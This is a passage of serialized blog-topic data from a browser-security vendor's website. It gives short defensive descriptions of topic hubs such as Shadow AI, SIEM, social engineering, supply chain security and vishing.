phishing kits and infostealers have made it a mainstream attack technique across both criminal and targeted intrusions. Push’s browser agent detects session token theft by adding telemetry to the user agent string, creating a high-fidelity signal for security teams.",77,{"sys":2042,"faqItemsCollection":2044,"name":2046,"slug":2047,"tier":45,"intro":2048,"faqTitle":33,"postCount":2049,"hasPage":60},{"id":2043},"topic-shadow-ai",{"items":2045},[],"Shadow AI","shadow-ai","Shadow AI is employees’ unsanctioned use of AI tools at work, putting corporate data into chatbots and assistants that security teams never approved and can’t see. Push’s own browser telemetry shows AI adoption acting as a force multiplier for shadow IT — potentially now outscaling shadow SaaS — and this hub tracks that research, real-world breach examples, and practical controls.",21,{"sys":2051,"faqItemsCollection":2053,"name":2055,"slug":2056,"tier":45,"intro":2057,"faqTitle":33,"postCount":2058,"hasPage":60},{"id":2052},"topic-shadow-saas",{"items":2054},[],"Shadow SaaS","shadow-saas","Shadow SaaS is the cloud applications employees adopt for work without IT approval, each one creating unmanaged accounts, identities, and data outside your security controls. Push covers the problem end to end — from browser-based SaaS discovery to in-browser app banners and MFA enforcement — alongside breach analyses that show where unmanaged accounts lead.",76,{"sys":2060,"faqItemsCollection":2062,"name":2064,"slug":2065,"tier":45,"intro":2066,"faqTitle":33,"postCount":2067,"hasPage":60},{"id":2061},"topic-siem",{"items":2063},[],"SIEM","siem","A SIEM is only as good as the telemetry feeding it, and most log sources never see what happens inside the browser — where phishing, session token theft, and account takeover actually play out. Push streams browser-level detections and identity telemetry into SIEMs, and these posts show how that data improves detection fidelity and cuts alert fatigue.",20,{"sys":2069,"faqItemsCollection":2070,"name":1690,"slug":1691,"tier":45,"intro":2072,"faqTitle":33,"postCount":1817,"hasPage":60},{"id":1689},{"items":2071},[],"Social engineering is the manipulation of people — through phishing pages, help desk impersonation, vishing calls, and poisoned tenant invites — into handing over access that no exploit could take. Coverage here tracks how threat actors run these plays — drawing on Push’s ongoing investigation of live phishing infrastructure and criminal tooling.",{"sys":2074,"faqItemsCollection":2076,"name":2078,"slug":2079,"tier":29,"intro":2080,"faqTitle":33,"postCount":2025,"hasPage":6},{"id":2075},"topic-supply-chain-security",{"items":2077},[],"Supply chain security","supply-chain-security","Supply chain security extends beyond your own perimeter to the vendors, platforms, and browser extensions your organization depends on. A compromised third party can hand attackers legitimate access — as recent campaigns against SaaS providers have shown. Push’s research examines the browser-extension supply chain in particular: why extension risk scores fail to predict compromise, and how developers can harden extensions against takeover. These posts frame supply chain risk through a browser and identity lens.",{"sys":2082,"faqItemsCollection":2084,"name":2086,"slug":2087,"tier":45,"intro":2088,"faqTitle":33,"postCount":2089,"hasPage":60},{"id":2083},"topic-swg",{"items":2085},[],"SWG","swg","A secure web gateway (SWG) filters and inspects web traffic in transit, sitting in the network path between users and the internet. That position shows you the packet but not the session: Push’s research on AitM phishing kits documents how attackers break the signatures proxies rely on, and these posts explain why phishing detection is moving from the network path into the browser itself.",18,{"sys":2091,"faqItemsCollection":2093,"name":2095,"slug":2096,"tier":45,"intro":2097,"faqTitle":33,"postCount":2098,"hasPage":60},{"id":2092},"topic-third-party-risk",{"items":2094},[],"Third-party risk","third-party-risk","Third-party risk is the exposure your organization inherits from vendors, SaaS providers, and integrations that hold your data or access your tenants — a chain now extended one employee sign-up at a time. This hub collects Push’s breach analyses and guides for assessing OAuth integrations, managing browser extensions, and responding when a supplier is compromised.",44,{"sys":2100,"faqItemsCollection":2101,"name":1714,"slug":1715,"tier":29,"intro":2103,"faqTitle":33,"postCount":2104,"hasPage":60},{"id":1713},{"items":2102},[],"The enterprise threat landscape is now defined by identity attacks: criminals log in with phished, stolen, or stuffed credentials rather than breaking infrastructure. Threat actors keep proving how effective help desk scams, MFA bypass, and session theft are against well-defended organizations. Drawing on breach analyses, annual phishing trend reviews, and in-the-wild campaign tracking, Push documents how attacker TTPs are shifting. This hub is where to follow those changes.",52,{"sys":2106,"faqItemsCollection":2108,"name":2110,"slug":2111,"tier":45,"intro":2112,"faqTitle":33,"postCount":1851,"hasPage":60},{"id":2107},"topic-vishing",{"items":2109},[],"Vishing","vishing","Vishing — voice phishing — uses phone calls to impersonate IT support, help desks, or employees, talking targets into password resets, MFA approvals, or opening attacker-controlled pages. Threat actors now routinely pair calls with AiTM phishing to hijack SSO accounts, a chain Push has analyzed across campaigns targeting hundreds of organizations.",{},"blogtopics","96NaQQtT0ris5S9gkZyLC3xAJxPpE2P-qt6DeNgci1c",1791539320446]